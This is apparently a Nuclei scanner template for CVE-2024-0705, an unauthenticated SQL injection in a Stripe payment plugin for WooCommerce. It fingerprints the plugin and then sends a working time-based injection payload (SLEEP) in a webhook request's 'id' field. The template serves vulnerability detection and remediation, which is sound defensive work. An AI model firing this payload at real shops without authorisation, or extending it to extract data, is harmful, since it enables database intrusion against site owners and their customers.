id: CVE-2024-0705

info:
  name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The Stripe Payment Plugin for WooCommerce for WordPress, in versions up to and including 3.7.9, is vulnerable to SQL injection via the 'id' parameter because the user-supplied value is insufficiently escaped and the SQL query is not prepared. Unauthenticated attackers can execute arbitrary SQL queries by sending a crafted 'id' parameter.
  remediation: |
    Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0705
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/"
  tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "payment-gateway-stripe")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /?wc-api=wt_stripe HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950